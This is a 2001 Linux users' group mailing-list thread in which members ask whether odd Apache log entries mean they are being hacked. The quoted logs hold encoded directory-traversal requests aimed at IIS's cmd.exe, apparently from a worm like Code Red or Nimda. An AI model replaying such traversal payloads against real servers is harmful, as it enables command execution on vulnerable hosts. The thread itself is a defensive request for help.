[aclug-L] Re: Hacker or ??

[Joshua S Brown <joshb@xxxxxxxxxxx>]

We are having the same problem on all our web servers. Is this a hack or
something like code red?


Josh Brown

On Tue, 18 Sep 2001, Maverick wrote:

>
> Hi, all
>  Recently I check on my apache webserver access.log
> and find out a lot of entrie like this:
> 24.254.90.73 - - [18/Sep/2001:10:44:38 -0700] "GET
> /scripts/..%c0%af../winnt/sys
> tem32/cmd.exe?/c+dir HTTP/1.0" 404 231
> 24.254.90.73 - - [18/Sep/2001:10:44:39 -0700] "GET
> /scripts/..%%35%63../winnt/sy
> stem32/cmd.exe?/c+dir HTTP/1.0" 400 215
> 24.254.90.73 - - [18/Sep/2001:10:44:41 -0700] "GET
> /scripts/..%%35c../winnt/syst
> em32/cmd.exe?/c+dir HTTP/1.0" 400 215
> 24.254.90.73 - - [18/Sep/2001:10:44:43 -0700] "GET
> /scripts/..%c1%9c../winnt/sys
> tem32/cmd.exe?/c+dir HTTP/1.0" 404 231
> .....
>
> Is that someone try to access my /var/www/scripts/?
> and my error.log generate something like this..
> Tue Sep 18 10:52:27 2001] [error] [client
> 24.234.20.197] File does not exist: /
> var/www/c/winnt/system32/cmd.exe
> [Tue Sep 18 10:52:28 2001] [error] [client
> 24.234.20.197] File does not exist: /
> var/www/d/winnt/system32/cmd.exe
> ....
>
> anyone have any idea? or did I set something wrong?
> or really have a hacker knocking on my door?
>
> Thanks.
> Mav
>
> __________________________________________________
> Terrorist Attacks on U.S. - How can you help?
> Donate cash, emergency relief information
> http://dailynews.yahoo.com/fc/US/Emergency_Information/
> -- This is the discussion@xxxxxxxxx list.  To unsubscribe,
> visit http://tmp2.complete.org/cgi-bin/listargate-aclug.cgi
>


-- This is the discussion@xxxxxxxxx list.  To unsubscribe,
visit http://tmp2.complete.org/cgi-bin/listargate-aclug.cgi